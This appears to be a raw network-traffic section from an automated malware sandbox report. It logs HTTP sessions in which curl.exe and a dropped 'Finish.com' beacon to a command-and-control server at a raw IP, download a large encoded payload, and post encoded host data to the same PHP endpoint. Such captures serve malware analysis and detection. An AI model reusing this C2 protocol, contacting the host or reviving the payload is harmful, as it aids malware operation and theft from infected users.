                                      Nov 24, 2024 12:05:01.264801025 CET1236INData Raw: 4e 44 53 55 46 44 51 30 4e 44 51 30 4e 42 51 30 6c 4a 51 30 4e 42 51 30 46 42 51 55 46 42 51 55 4e 4a 51 30 46 42 51 55 4e 44 51 55 46 44 51 55 46 42 51 30 46 4a 51 55 4e 44 51 55 46 44 51 55 4e 44 51 30 46 44 51 30 4e 42 51 55 46 44 53 55 4e 42
                                      Data Ascii: NDSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ
                                      Nov 24, 2024 12:05:01.264834881 CET1236INData Raw: 4e 42 51 55 4e 42 51 55 46 44 51 55 6c 42 51 30 4e 42 51 55 4e 42 51 30 4e 44 51 55 4e 44 51 30 46 42 51 55 4e 4a 51 30 46 42 53 55 4e 44 53 55 46 44 51 30 4e 44 51 30 4e 42 51 30 6c 4a 51 30 4e 42 51 30 46 42 51 55 46 42 51 55 4e 4a 51 30 46 42
                                      Data Ascii: NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQ
                                      Nov 24, 2024 12:05:01.264869928 CET1236INData Raw: 46 4a 51 30 4e 4a 51 55 4e 44 51 30 4e 44 51 30 46 44 53 55 6c 44 51 30 46 44 51 55 46 42 51 55 46 42 51 30 6c 44 51 55 46 42 51 30 4e 42 51 55 4e 42 51 55 46 44 51 55 6c 42 51 30 4e 42 51 55 4e 42 51 30 4e 44 51 55 4e 44 51 30 46 42 51 55 4e 4a
                                      Data Ascii: FJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0NDQ0NBQ0dhYGBRQ0FpMFFrQ0t8T0pBUlNXZWdPQUFBQ2cwUUt1NUNTa0hBU2tIQVNVVk5UXm5kb1FLM0tBRW1BNEhDYkNZSm02SFhBQUdvQzZSe1hBUUJtNkhaQ0FHb1I2RzhYQ1FCbTRKWENBR
                                      Nov 24, 2024 12:05:01.264904022 CET1236INData Raw: 67 32 51 33 46 50 4f 6d 74 72 53 55 4e 4e 49 7a 4e 77 53 6c 6c 59 4c 57 52 41 62 45 70 43 5a 55 4e 44 51 55 46 44 54 6c 68 6e 65 56 4e 5a 5a 55 46 45 4d 57 74 30 57 6e 56 6b 62 55 4e 72 57 6c 42 44 61 57 74 4c 51 57 39 56 51 31 4e 52 5a 55 74 44
                                      Data Ascii: g2Q3FPOmtrSUNNIzNwSllYLWRAbEpCZUNDQUFDTlhneVNZZUFEMWt0WnVkbUNrWlBDaWtLQW9VQ1NRZUtDT0FCM0RvdEVCSVBFQkFQRkBJWENENlZ1QUNDQ28wQ1FZZUNGcVMpTTBDQ0NDS083Q0kjR0dBR0FBSXQ4SkBxTlZDUVtrOHVISGVpUVFvQXB4OEg3QWt0UGlQVTpra0lDPmNVQUlDQU4vdSlEbFNDQUNBe0V0ekBRU
                                      Nov 24, 2024 12:05:01.264938116 CET1236INData Raw: 56 6e 52 55 6c 44 51 7a 38 34 4d 56 4e 4d 61 31 41 7a 56 57 6c 6a 51 55 4e 50 4c 32 42 77 56 6e 64 52 51 55 46 50 61 30 52 57 53 6b 70 42 51 30 46 46 51 30 46 42 52 48 4a 54 53 56 46 44 51 30 52 32 65 45 51 32 56 46 56 43 51 30 4e 44 54 31 49 78
                                      Data Ascii: VnRUlDQz84MVNMa1AzVWljQUNPL2BwVndRQUFPa0RWSkpBQ0FFQ0FBRHJTSVFDQ0R2eEQ2VFVCQ0NDT1IxQ2NpSUFMNlRfQkNDQ2tWM0FpY0FDa2dhNnczVXppMllpRUlQNkNRK01NUVFDQUFQQEBJdlNTbW5PSkBrTkFZbFdCQENqWUhIS0FLQzZOUylFR39ZQ0NEZWZENFQxQXVJQ2lrY0BQenJGRDRUckF/QUNra2NAUnhwR
                                      Nov 24, 2024 12:05:01.264972925 CET1236INData Raw: 46 45 64 6e 68 6d 51 54 4a 49 53 46 6c 54 55 56 46 76 51 58 67 37 64 57 31 6f 51 56 4e 44 51 33 68 31 56 55 64 72 61 30 6c 44 53 56 4e 42 51 55 6c 4e 62 31 31 42 55 30 4e 44 54 53 31 4d 4d 45 5a 52 59 32 5a 72 53 6b 68 44 51 55 52 51 4d 6a 5a 62
                                      Data Ascii: FEdnhmQTJISFlTUVFvQXg7dW1oQVNDQ3h1VUdra0lDSVNBQUlNb11BU0NDTS1MMEZRY2ZrSkhDQURQMjZbRUBBQURKQFlpUVFnQUBBSUFDNFhRQEFDQzU4MVNQeHdWbWNpSUFJU0NJQUZSMDRUOkJDSUtISldrU1FnRHBWQ01DQUtHT2lrSUNPL04yR1t2RU85STV3dSlnd2ltaDBEUDBhUFdNY2lLSTZWS0BDQ0M3dTtZU21Ze
                                      Nov 24, 2024 12:05:01.385499001 CET1236INData Raw: 56 6a 61 55 6c 42 62 45 5a 70 50 55 68 56 65 31 46 54 5a 55 41 77 54 31 39 76 51 45 42 42 51 30 46 68 54 58 70 73 55 56 4e 4b 62 55 4a 4b 64 45 46 44 54 32 68 68 52 47 64 46 51 32 63 77 55 55 74 58 52 32 64 48 62 54 4a 4c 51 32 46 48 51 56 46 52
                                      Data Ascii: VjaUlBbEZpPUhVe1FTZUAwT19vQEBBQ0FhTXpsUVNKbUJKdEFDT2hhRGdFQ2cwUUtXR2dHbTJLQ2FHQVFRZ0QtTlV5ZFl1QUx4QEFISlpBU1NvSTdKYVFTUWdCMEZFZ0A2SGwwQ1FDRnhBU0R3QFVFa1IyaWtpS0NpMnVpRUl0R0JAU0w4V29OMGxQWk06TDFXcmNmV0pIQ0FIVXJPUDpDa2tJQ2ZTTTdIWXlRUW9CM0V6a2ZuS


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.549818178.215.224.74803580C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:03.186362982 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:04.541027069 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:04 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.549824178.215.224.74805620C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:04.905486107 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:06.213546991 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:05 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.549829178.215.224.74807128C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:06.508723021 CET118OUTGET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:08.066881895 CET1236INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:07 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 31 62 61 62 34 38 0d 0a 56 55 56 7a 52 6b 70 41 55 55 46 4a 51 30 4e 42 51 55 42 71 62 6b 70 48 64 30 39 36 4d 56 49 33 59 56 52 48 51 6b 46 42 51 6b 46 42 5a 55 6c 4c 51 55 46 42 51 30 77 7a 63 44 5a 5a 55 7a 56 70 59 6b 39 36 63 53 31 52 4f 54 5a 47 54 46 70 55 51 55 4d 31 55 6c 70 44 5a 6b 68 6a 51 58 70 7a 55 57 70 59 55 55 70 56 63 32 31 7a 4f 6c 74 48 54 47 70 43 55 45 64 36 5a 47 39 43 63 6b 74 69 5a 30 56 79 57 32 74 48 55 55 5a 54 5a 30 70 32 53 6c 6b 77 63 6d 4a 66 62 56 74 42 59 57 64 70 51 6d 68 62 59 45 31 77 61 55 31 5a 62 43 73 79 49 33 5a 61 55 32 35 56 64 6d 6f 79 4f 30 6c 56 64 6e 5a 59 52 31 45 6a 4f 48 63 79 56 33 56 70 51 33 56 47 55 45 5a 62 58 7a 46 53 61 31 64 6d 5a 6c 56 4e 54 47 64 6f 51 58 56 4e 66 44 67 33 4f 79 73 33 62 30 77 37 62 53 30 33 4b 53 30 78 55 47 4d 76 4d 56 68 41 4f 46 41 36 57 47 38 39 4c 79 6b 70 4e 7a 63 33 4e 7a 64 34 65 6d 5a 73 62 48 56 33 4e 57 46 34 64 47 34 30 52 6d 42 4e 5a 30 51 35 5a 6a 63 33 5a 30 31 71 64 6a 46 34 59 33 34 76 4f 6d 77 31 62 6d [TRUNCATED]
                                      Data Ascii: 1bab48VUVzRkpAUUFJQ0NBQUBqbkpHd096MVI3YVRHQkFBQkFBZUlLQUFBQ0wzcDZZUzVpYk96cS1ROTZGTFpUQUM1UlpDZkhjQXpzUWpYUUpVc21zOltHTGpCUEd6ZG9CcktiZ0VyW2tHUUZTZ0p2SlkwcmJfbVtBYWdpQmhbYE1waU1ZbCsyI3ZaU25VdmoyO0lVdnZYR1EjOHcyV3VpQ3VGUEZbXzFSa1dmZlVNTGdoQXVNfDg3Oys3b0w7bS03KS0xUGMvMVhAOFA6WG89LykpNzc3Nzd4emZsbHV3NWF4dG40RmBNZ0Q5Zjc3Z01qdjF4Y34vOmw1bmx1QW5admhBRGUzYlFpNU02I0dVfnpRc3R0VWZkenx6NDUzNHovbXZmenRiRTE3N3hsZTlJR1Y5ZG5eRXRkeWZobnc7aUZBNnd5L2owbCk5ZW5hUmN5UW8wVUBuMTExaWZMeGVmVG92Ly9mejo0N1RwNkZtUzl0OXIxMVBsRjlPKVNyKVJwTzBFNTVQQX5wUWJpZnJ8YVZPdXRkQ3FWXyc7NG4pbjFjTHo1bWtmYWJQbTIwVFZSMUopUUZNZG9QMEtmUTQ3NXp3M1dNOFoxYW5yPHBqTmZASDE2NG9mTkF9SjtYRzN6RXFGTU09VDZQQU5OT3lMbCtIZmpCRTpAUVY7VDBAdTVOa1BKeGNhS1d5Z34wYD5mKVZISnFHWkFscjtXRlFoSllIellvSnhBdGM1bFp2Njc4a0d6eHpFLWZ2LW9IMVJmR2wyRGRMc0xQSThYMTJkMWstcXN4QzJWWWpKcGJzaC91NnZTVCdoT0VkZ3BPKzF3Yk9aWn9sRWFNZDdBMnRFUGBpU015YXVyc2NrYkc6UHZFSmZAcnNTVHpdMG5zNjRMbDBDcEl8ZFYvOExwR280Z3cxbGhtZVdBZVU3YjRqZHZnYzVrTEQ2XWVZcj9oSDxYaE9qMVZ4dS0nI1Itb3RRbjJ0MjhmcFZ6WFVIWHFYQ
                                      Nov 24, 2024 12:05:08.066999912 CET1236INData Raw: 31 52 42 63 48 5a 6e 5a 69 74 54 62 6a 51 7a 61 6b 46 6f 54 31 6f 31 54 7a 41 31 4b 30 51 77 51 54 31 36 4f 46 56 53 54 55 78 63 64 46 4e 78 56 6e 68 45 52 31 52 79 51 57 51 70 4e 30 49 36 56 54 56 6d 5a 57 5a 31 61 6e 74 42 51 57 74 49 4e 33 70
                                      Data Ascii: 1RBcHZnZitTbjQzakFoT1o1TzA1K0QwQT16OFVSTUxcdFNxVnhER1RyQWQpN0I6VTVmZWZ1antBQWtIN3pKeGU5SzBJMGQ5b1I1cFpaZERUTnZ6S0dvMUdGdHZ2PEVQempkLTBMUm5hNmBEM0BsR3RIdEsyNjV6Z0VwVFE3L3U1elA2dTRDaXszTDlqRDQ0cVhuNDN4OHgzXkpMSnJmRFhPbGVsM3p7TjJ5UVdFM1RvQUNtM2lW
                                      Nov 24, 2024 12:05:08.067051888 CET448INData Raw: 6d 31 61 4b 57 63 7a 54 46 68 42 56 55 52 4a 59 57 6b 37 4f 45 42 49 59 57 31 48 51 7a 4a 57 55 6c 4d 33 54 6c 56 6e 61 6d 74 49 62 58 68 46 51 55 6c 75 62 53 74 49 56 56 46 50 54 54 45 30 63 57 41 77 5a 58 6f 31 65 48 46 55 4e 45 35 7a 55 6b 4e
                                      Data Ascii: m1aKWczTFhBVURJYWk7OEBIYW1HQzJWUlM3TlVnamtIbXhFQUlubStIVVFPTTE0cWAwZXo1eHFUNE5zUkNLQ0A+Q21qbVFSNThMWUNsSElaZElpN2l6UGZhc2hoY25wRXMwVmRyMT1zZkpEa3JKUGEzNTMtSHllY2FcVUxEPWZDSnIxW1NRTlgrayNBUXZZLWhEWkJ1MlZBbkNWcEw2RWRtVDFYTitMYlAwZEloaWcycjhGS3Rl
                                      Nov 24, 2024 12:05:08.067086935 CET1236INData Raw: 44 4a 47 63 6c 46 6a 62 45 38 78 51 30 6c 54 64 6a 64 6e 54 6a 4e 36 4d 55 46 42 64 58 52 75 51 30 31 41 53 7a 6b 77 51 6b 42 7a 4c 55 52 47 62 55 68 75 56 6c 64 52 58 6d 35 69 53 45 6c 42 62 57 46 52 55 69 31 42 61 46 4e 4d 62 32 68 63 4d 45 55
                                      Data Ascii: DJGclFjbE8xQ0lTdjdnTjN6MUFBdXRuQ01ASzkwQkBzLURGbUhuVldRXm5iSElBbWFRUi1BaFNMb2hcMEUyVEl5QXVpUC9XcExuaDBjTnFXUVRyZlZXbVBSN2VTeFBvaDRENUYteVdvSEApZ2hgem1lMTdDN0xXczIycmR0MWdONVZMelo4V083YUNHTTtXTEZGV3JqTGxDKVpPVEdicVVQcWdGa0k1T3F6QGRqPVF0emhbdlpX
                                      Nov 24, 2024 12:05:08.067137003 CET1236INData Raw: 55 56 79 54 32 5a 41 56 33 4a 36 4e 48 5a 4f 4d 33 52 4e 5a 44 70 30 55 6e 46 76 5a 6c 4e 6e 4e 33 46 58 51 7a 68 39 64 56 68 36 52 6c 46 4a 65 56 5a 79 5a 6a 5a 45 64 47 35 72 4e 31 52 6d 55 6d 6c 52 57 6d 74 4f 55 54 52 38 53 6a 52 4e 63 43 74
                                      Data Ascii: UVyT2ZAV3J6NHZOM3RNZDp0UnFvZlNnN3FXQzh9dVh6RlFJeVZyZjZEdG5rN1RmUmlRWmtOUTR8SjRNcCt7WHJUZWhwNHZtNndbSTthdkJIa2xQOkVTeHNkU2NqYVhqaClaaGVFWTBpZDYvOWNHcHN3SjFKeE93PVJDemdNSkcwYztpSm5IRWxBa3swT3BDRylLRjZ2aHNUR3lEJ2U1QE1kNSt1TnprS31BQWREWm9yVng1M1Fm
                                      Nov 24, 2024 12:05:08.067174911 CET1236INData Raw: 7a 4a 6f 51 31 4a 44 4e 46 45 33 55 32 31 55 56 58 4a 4f 55 57 4e 73 52 6a 5a 77 56 55 4a 74 53 7a 67 78 57 6c 46 71 54 54 51 32 56 31 46 44 65 45 38 7a 54 44 5a 61 64 32 6c 79 51 32 78 48 62 6c 68 42 52 6b 70 4f 53 69 6c 76 4e 6d 78 69 51 56 67
                                      Data Ascii: zJoQ1JDNFE3U21UVXJOUWNsRjZwVUJtSzgxWlFqTTQ2V1FDeE8zTDZad2lyQ2xHblhBRkpOSilvNmxiQVg5WnJsUEMxL1FHNjNbZEpRWUdQSktyaW10U2RZM1VwdjBPYUtBMDg0ZkNWWk1PemtGLzx6QUlXaEB2RjtyNzB8cnJOVUpUZG1oVU5YXWROSlZJTVhLezdzNHU2fENtSVFpMEtmVWZNV0dESUpCd0w6YVdFdGNsUWAt
                                      Nov 24, 2024 12:05:08.067209005 CET1236INData Raw: 45 46 77 63 44 70 59 56 6d 6c 58 55 45 59 78 52 7a 6c 49 53 6e 6c 74 52 54 56 37 51 57 68 58 63 6a 70 74 62 32 51 33 63 57 39 73 57 7a 68 51 53 6b 46 7a 65 6c 56 51 62 7a 67 74 54 45 74 6f 4d 44 46 53 52 54 42 43 5a 56 6c 47 59 32 4a 58 64 46 5a
                                      Data Ascii: EFwcDpYVmlXUEYxRzlISnltRTV7QWhXcjptb2Q3cW9sWzhQSkFzelVQbzgtTEtoMDFSRTBCZVlGY2JXdFZ1V1d4dkxJNHtAeldhSGlbMEY5bHpTRHBrMjBrSXtIM24+MlN6VjVaMkRLeG5ZTWhzcWZRM3c3eEdQT0NhdXdLZFUzNUZVOm9kM3ZDbmJUTlJpRXFoSExoaURKVzQ1cEdea3NDS0hTYjhpaGpWX1ZJNDYxRTI3SlVr
                                      Nov 24, 2024 12:05:08.067245007 CET1236INData Raw: 56 68 56 52 57 46 5a 53 31 49 7a 61 30 4a 4d 51 46 42 4c 56 6a 46 4e 54 33 68 74 55 48 4a 35 55 55 5a 4d 54 32 67 32 54 47 74 6c 64 6c 46 4e 51 33 46 79 52 47 46 46 55 55 52 4c 62 6d 31 75 52 54 42 6a 57 6a 56 4c 55 45 74 51 4b 58 6f 77 5a 6a 4a
                                      Data Ascii: VhVRWFZS1Iza0JMQFBLVjFNT3htUHJ5UUZMT2g2TGtldlFNQ3FyRGFFUURLbm1uRTBjWjVLUEtQKXowZjJWQVwxc1dxSFlVS25ZdG4wYVdmUjRqcWtsVDJtRkpRcEBWNm5ZSFRRY05mUVVOdFU8RElLTmtpTjVYM09tREliantgKXprbVcybERLTlBOUEtTbUdBYVM2aTd2YUJcekctaElJVzZuezNlalVMOUspPmp1TDlbdk9Z
                                      Nov 24, 2024 12:05:08.067276955 CET1236INData Raw: 6e 52 45 65 6e 52 51 53 33 4e 42 4d 6d 70 6c 61 47 78 59 51 55 56 76 59 6b 6c 62 4d 31 70 57 57 6c 59 7a 54 69 31 57 51 6b 42 77 51 6e 4a 70 63 54 5a 46 4d 32 67 33 63 31 70 44 52 47 35 55 5a 45 45 32 4e 45 4a 4b 56 7a 6c 46 51 79 31 79 59 58 5a
                                      Data Ascii: nREenRQS3NBMmplaGxYQUVvYklbM1pWWlYzTi1WQkBwQnJpcTZFM2g3c1pDRG5UZEE2NEJKVzlFQy1yYXZIcUlob2RjMjpNRGhmUXhQV2NDUmZyZnU4VGhjaEpuaCtBfk9LWEo0bzhORnJvVnt1Lzc0bENFYzBFd3JTY0svQTJTVW5zMzBlRkx1SThRd3JBbkNQZnZrYWlBVVNSZElOTG4/YUxPbnl0VUluM2Z5dmJIV1hpK3ZR
                                      Nov 24, 2024 12:05:08.067329884 CET1236INData Raw: 6d 52 75 55 48 49 32 61 6c 5a 33 54 6b 31 6c 4e 30 70 43 55 6a 56 6f 56 7a 46 32 55 54 4d 7a 56 32 4a 44 62 58 64 6e 63 57 52 61 64 44 4e 59 4d 46 74 6a 52 6a 6c 32 54 6a 46 6c 55 7a 64 4e 51 58 5a 6a 57 6d 52 56 63 6e 70 58 4e 56 56 51 53 48 4d
                                      Data Ascii: mRuUHI2alZ3Tk1lN0pCUjVoVzF2UTMzV2JDbXdncWRadDNYMFtjRjl2TjFlUzdNQXZjWmRVcnpXNVVQSHM6MkkxXVVyVHJkRy9nQWlHZmxNc21xTkJXV3RXS1thf1lhSzRQU087MXpHW3puY3FYd05TQjVBSmFeVEhpQEhUZDd7J29xY3pHTDFTVTZUcV9FSDdJW2llVlFza2N6WG1LWjZOdEZIdXhoVzdrbGJWZ2UjaU5pUkdp
                                      Nov 24, 2024 12:05:08.187191010 CET1236INData Raw: 30 68 55 62 57 35 4f 5a 54 55 36 4f 55 6c 68 4c 58 4a 55 54 55 5a 35 59 33 5a 6b 53 6e 4a 53 51 69 73 37 55 6d 38 7a 57 44 74 36 4d 48 34 78 63 57 68 54 4f 6d 74 7a 4f 47 68 72 65 6b 78 66 4b 57 5a 49 53 32 56 79 4f 45 68 37 51 58 42 61 52 6a 56
                                      Data Ascii: 0hUbW5OZTU6OUlhLXJUTUZ5Y3ZkSnJSQis7Um8zWDt6MH4xcWhTOmtzOGhrekxfKWZIS2VyOEh7QXBaRjV9UlVIMGlyVHQ6Z3dQRXNQK250OXJuNH16MngwTnt2bkNIVjZ6aUNxbm1BRnFmZTQwcHpLb0VbQ2dGbC8xNjVpf1hMUk9QVWNvbkxWdlZIT0FObD1EVFVwdk45S3dtRTNMQ1dxfzpxRVVRZ1hRQjhUdls7MXFpWE1O


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.549844178.215.224.74803996C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:12.612354040 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:13.912841082 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:13 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.549847178.215.224.74804524C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:14.195046902 CET98OUTGET /v10/ukyh.php?jspo=31 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:15.569015026 CET230INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:15 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 30
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36
                                      Data Ascii: 4CA966315CCC70F4BEF0FE322EDE46


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.549858178.215.224.74803224C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:18.993318081 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:20.258131981 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:20 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.549864178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:20.596874952 CET933OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 639
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 46 75 62 6d 64 73 63 56 78 44 63 48 42 45 59 58 52 68 58 6c 70 74 59 57 31 70 62 47 56 63 52 47 31 73 63 47 68 72 62 6b 78 31 62 33 4a 7a 58 44 41 35 4d 44 49 79 52 54 41 79 4c 7a 42 44 4d 44 49 6c 4e 6a 55 78 4f 79 38 30 4f 30 49 37 57 55 4a 66 4d 7a 49 77 4b 44 6b 34 4d 6a 73 7a 4b 48 64 70 62 6d 52 76 64 33 45 6f 5a 6d 56 6d 5a 57 78 6d 5a 58 4a 5a 51 46 30 78 4d 6a 41 69 4d 54 49 79 4d 54 41 6f 4d 54 55 36 4c 44 49 7a 4e 79 77 79 4d 6a 51 73 4f 6a 63 79 57 30 68 66 4d 7a 67 77 4b 44 4d 79 4d 6a 4d 77 4b 6a 4d 25 32 46 4d 43 77 77 4d 54 63 75 4d 6a 49 30 4c 6a 63 32 55 30 4a 64 4d 54 41 79 4b 44 45 77 4d 6a 45 78 4b 6a 4d 33 4d 43 34 77 4d 7a 55 75 4d 44 49 32 4c 44 55 30 57 55 4a 66 4d 69 6f 79 4d 6a 30 6f 51 7a 70 55 56 33 46 74 63 6e 46 65 59 32 35 6b 62 57 35 78 56 45 6c [TRUNCATED]
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmFubmdscVxDcHBEYXRhXlptYW1pbGVcRG1scGhrbkx1b3JzXDA5MDIyRTAyLzBDMDIlNjUxOy80O0I7WUJfMzIwKDk4MjszKHdpbmRvd3EoZmVmZWxmZXJZQF0xMjAiMTIyMTAoMTU6LDIzNywyMjQsOjcyW0hfMzgwKDMyMjMwKjM%2FMCwwMTcuMjI0Ljc2U0JdMTAyKDEwMjExKjM3MC4wMzUuMDI2LDU0WUJfMioyMj0oQzpUV3FtcnFeY25kbW5xVElyckRjdGFcUm9hb2FsZ1xEbW5waGtuRHVvcHtcY3h2dyxlemdZQF8zMjAqMTI4MzEqOTU6JjIzNywwMDYuNTxTQl8yKDIwNSpDOl5dcWVyc15jbGZtbnNcQ3B4RGN2YVxQb2Nva25lXkZvbHBqYWxEdWVycVR4anVzLHhrcFlIVTMyMCgxMDEyMypBMl5Vc2VwcVxhbmZvbnFcSXByRmF0Y1xQbWNta2xlXERvbnhqaW5Md294c156anVzLHpreFNCXzEyMCoxMDAxMyIzNzguMDM1LjAyNC41NFNAXw%3D%3D
                                      Nov 24, 2024 12:05:21.959080935 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:21 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.549870178.215.224.74801496C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:22.781749964 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:24.092103958 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:23 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.549874178.215.224.74804276C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:24.421266079 CET97OUTGET /v10/ukyh.php?jspo=7 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:25.734803915 CET299INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:25 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Content-Length: 76
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 57 30 42 64 57 55 68 66 57 30 42 56 57 55 4a 56 5a 6d 4e 75 63 57 64 5a 51 6c 31 6b 61 57 52 78 5a 31 74 43 58 56 4a 6c 64 6d 56 75 64 32 31 47 5a 58 5a 70 59 57 64 7a 4c 6d 64 34 5a 53 6f 7a 57 30 68 64 4d 7a 49 71 57 30 4a 64
